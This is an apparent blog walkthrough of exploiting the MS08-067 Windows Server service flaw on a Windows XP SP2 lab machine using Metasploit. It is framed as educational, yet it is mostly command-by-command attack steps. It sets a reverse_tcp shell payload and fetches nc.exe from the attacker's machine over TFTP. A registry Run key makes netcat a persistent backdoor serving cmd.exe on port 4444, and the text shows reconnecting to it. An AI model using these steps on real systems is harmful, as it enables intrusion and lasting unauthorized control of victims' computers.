Microsoft Security Bulletin MS08-067 – Critical
DISCLAIMER:
Content provided in this blog can only be used for your own educative purposes. Using these hacks outside of your own computer or network is forbidden and strictly illegal. If you use these techniques in an illegal way you will be punished by law. Our articles and blogs provided and created for testing internet security and for learning how to help the world make a new security and how to close the holes, backdoors and any other internet security related help and fixes.
Owners of this blog are not responsible for your illegal actions.
Executive Summary:
Remote code execution vulnerability exists in the Server service on Windows systems. The vulnerability is due to the service not properly handling specially crafted RPC requests. In this video we demonstrate how to make use of this vulnerability with the help of Metasploit and install as Backdoor on Windows XP sp2 systems.
The generic lab setup for this demonstration will be as follows:
Consider victim machine running on windows XP sp2.
To get the ip address Go to
START -> RUN and type ‘cmd’, type ‘ipconfig’ which displays the ip address. (10.10.1.103)
As an attacker’s machine, we use BackTrack 3
Switching to BackTrack 3
To get the ip address in BackTrack,
Click on konsole icon on the taskbar and type ‘ifconfig’. (10.10.1.101)
For this demonstration we will be working on console mode of Metasploit 3.
Change present working directory to ‘/pentest/exploits/framework3’
To run Metasploit execute ‘./msfconsole’
Metasploit welcome screen displays available exploits, payloads, encoders etc.
Enter ‘search 067’ to search the ms08_067_netapi exploit module
Now we need to tell Metasploit to use ms_08_067_netapi module, for this type:
‘use windows/smb/ms08_067_netapi’
‘show options’ displays the current settings and the settings required to change.
RHOST is Remote Host, set RHOST by typing
‘set RHOST
‘show payloads’ command will list all payloads that are compatible with the selected exploit
Set reverse_tcp payload by typing:
‘Set PAYLOAD windows/shell/reverse_tcp’
use the ‘show options’ command to check which options have been set and which are required to be set
LHOST is Local Host, set LHOST by typing
‘set ip> ’
The ‘show targets’ command will list all available targets for the selected exploit module
The ‘exploit ‘command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system.
If everything goes well, you get the shell of the remote system.
Now we will create a backdoor using netcat, for that start tftp.
Open a new konsole, konsole2 and change present working directory, type:
‘cd /tmp’
Make a copy of netcat (nc.exe) in the the temp directory of tftp which is ‘/tmp’
To start tftp Go To
Services->TFTPD->Start TFTPD
Transfer nc.exe to victim’s system by executing
‘tftp –i get nc.exe’ on victim’s shell.
Now to make netcat.exe run as a startup on victim’s machine type
‘reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d “%systemroot%\system32\nc.exe –L –d –p 4444 –t –e cmd.exe’
Now netcat will be listening on port 4444 even after every restart.
Restart windows xp.
To check listening and opening ports type:
netstat –an
netcat is listening on port 4444
To connect back to victim’s machine type:
‘telnet 44444’
This would again give you the victim’s shell.
Conclusion
Undoubtedly (MS08-67), which was used by Conficker and many of its type variant worms, is one of the biggest issues. So in this article we demonstrate how to use Metasploit, work on (MS08-67) exploit, own Windows XP sp2 systems and place netcat as a backdoor on the victim system.
http://www.cycops.co.in
http://www.cycops.co.in
No comments:
Post a Comment